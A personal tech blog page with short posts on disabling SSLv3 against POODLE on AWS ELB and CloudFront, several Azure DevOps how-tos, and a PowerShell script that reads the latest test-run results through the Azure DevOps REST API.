My Quotes


When U were born , you cried and the world rejoiced
Live U'r life in such a way that when you go
THE WORLD SHOULD CRY






Tuesday, July 23, 2019

How to Prevent POODLE Attacks on AWS ELB And CloudFront

    What is POODLE?
  1. To maintain compatibility with legacy servers, many TLS clients implement a downgrade dance: in a first handshake attempt, offer the highest protocol version supported by the client;
  2. if this handshake fails, they retry (possibly repeatedly) with earlier protocol versions.
  3. Unlike proper protocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, TLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers.
  4. So if an attacker that controls the network between the client and the server interferes with any attempted handshake offering TLS 1.0 or later, such clients will readily confine themselves to SSL 3.0.
  5. Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher in CBC mode.
  6. RC4 is well known to have biases, meaning that if the same secret (such as a password or HTTP cookie) is sent over many connections and thus encrypted with many RC4 streams, more and more information about it will leak.
  7. Unlike with the BEAST and Lucky 13 attacks, there is no reasonable workaround.
  8. This leaves us with no secure SSL 3.0 cipher suites at all: to achieve secure encryption, SSL 3.0 must be avoided entirely.
    Disable the SSLv3 Protocol to handle POODLE attacks on Cloud Front
  1. Similarly to Amazon ELB, Amazon AWS has taken care of the issue disabling SSLv3 for the customers who use the default SSL settings.
  2. Nevertheless, customers who are using custom SSL certificates with Amazon Cloud Front should disable the SSLv3 protocol manually by following the steps below in the Amazon CloudFront Management Console:
  3. Select your distribution, then click “Distribution Settings”.
  4. Click the “Edit” button on the “General” tab.
  5. In the “Custom SSL Client Support” section, select the option that says: “Only Clients that Support Server Name Indication (SNI)”.
  6. Click “Yes, Edit” to save these revised settings.
    Disable the SSLV3 Protocol to handle POODLE on Amazon AWS ELB
  1. All the ELBs which are created after 10/14/2014 5:00 PM PDT will use a new SSL Negotiation Policy that will by default no longer enable SSLv3.
  2. For the existing ELBs, it’s necessary to manually disable SSLv3 via the AWS Management console:
  3. Select your load balancer (EC2 -> Load Balancers) in the appropriate region
  4. In the Listeners tab, click “Change” in the Cipher column.|
  5. Ensure that the radio button for “Predefined Security Policy” is selected, in the dropdown select the “ELBSecurityPolicy-2014-10” policy.
  6. You can see the Protocol-SSLV3 is unchecked after selecting the policy.
  7. Click “Save” to apply the settings to the listener
  8. Repeat these steps for each listener that is using HTTPS or SSL for each LoadBalancer.

Thursday, January 3, 2019

Azure Dev Ops - Variable Group


  1. ADO you may want use variables which might be used across many jobs in the pipeline
  2. Rather than defining them in each and every pipeline job, ADO gives the option to define them as Variables Groups
  3. Once defined these variables can be linked to any job in the pipeline
  4. Manage Variables Groups --> Create
  5. Make sure to Allow access to all pipelines is ENABLED
  6. From the Builds --> Variables --> Variable Groups --> Link Variable Groups
  7. Select the Group and Click on Link
  8. You should be able to get the variables declared in the group

Azure Dev Ops- Invoke Agent Demands


  1. ADO you may want to force the pipeline builds to run against a specific agent in an agent pool.
  2. This is possible via “Demands” in the Pipeline builds as shown below
  3. The scenario check to run the TASK against a specific agent name
  4. If the agent name matches from the agent pool, then the job will run else the job will switch to the next agent and then condition will be checked against that agent in that pool.
  5. Until the condition is met the agents in the pool will be round robinly selected by the JOB
  6. This mechanism is used to check the conditions for running a job in a pipeline during runtime

Azure Dev Ops - Personal Access Tokens

In My previous post , I mentioned that in order for using REST API calls in ADO you need to use TOKENS to invoke the REST CALLS.

Here is a mechanism to generate the Personal Access Tokens

  1. Click on the AZURE DEV OPS



  2. Click on your Profile


  3. Click on Personal Access Token



  4. Copy the TOKEN from the SUCCESS screen into the REST API call

Capture last TEST Run results AZURE DevOps

You could retrieve the list of test runs, the sort descending the result on ID, since the most recent test run has the greatest ID. Then get the first item of the result. All of this shown below in powershell:

$testingBaseUrl = "https://dev.azure.com/cbre/Research%20Engine/_apis/test/runs"
$testingUrl = $testingBaseUrl + "?api-version=5.0"
$testingUrl = $testingUrl + "-preview.2"

write-host $testingUrl


#create auth header to use for REST calls
$username = "RKesavana"
$token = "your token"  Refer to my blog of how to create Personal access tokens  

#create auth header to use for REST calls 
$accessToken = ("{0}:{1}" -f $username,$token) 
$accessToken = [System.Text.Encoding]::UTF8.GetBytes($accessToken) 
$accessToken = [System.Convert]::ToBase64String($accessToken) 
$headers = @{Authorization=("Basic {0}" -f $accessToken)} 


try{
# write-host "To fetch LIST all the Test ID's information"
$testRuns=Invoke-RestMethod -Uri $testingUrl -Method Get -Headers $headers
$testRunsIdSorted = $testRuns.value | sort-object id -Descending
# write-host $testRunsIdSorted

$testURLByRunID= $testingBaseUrl+"/"+$($testRunsIdSorted[0].id)
$testURLByRunID= $testURLByRunID+ "?api-version=5.0"
$testURLByRunID = $testURLByRunID + "-preview.2"

write-host "To fetch the MOST RECENT run Test RUN ID"
write-host $testURLByRunID
$mostRecentTestRun = Invoke-RestMethod -Uri  $testURLByRunID -Headers $headers -Method Get | Select-Object id,name,url,build,isAutomated,iteration,owner,project,startedDate,completedDate,state,totalTests,incompleteTests,notApplicableTests,passedTests,unanalyzedTests,revision,webAccessUrl

#PRINT the values from the  REST calls 

write-host  "owner" $mostRecentTestRun.owner
write-host "startedDate" $mostRecentTestRun.startedDate
write-host "completedDate" $mostRecentTestRun.completedDate
write-host "totalTests" $mostRecentTestRun.totalTests
write-host "incompleteTests" $mostRecentTestRun.incompleteTests
write-host "notApplicableTests" $mostRecentTestRun.notApplicableTests
write-host "passedTests" $mostRecentTestRun.passedTests
write-host "unanalyzedTests" $mostRecentTestRun.unanalyzedTests
write-host "revision" $mostRecentTestRun.revision
write-host "webAccessUrl" $mostRecentTestRun.webAccessUrl


write-Host "##vso[task.setvariable variable=mostRecentRun;]$mostRecentTestRun


}  Catch  { $exception = $_.Exception
  $respstream = $exception.Response.GetResponseStream()
  $sr = new-object System.IO.StreamReader $respstream
  $ErrorResult = $sr.ReadToEnd()
  write-host $ErrorResult 
}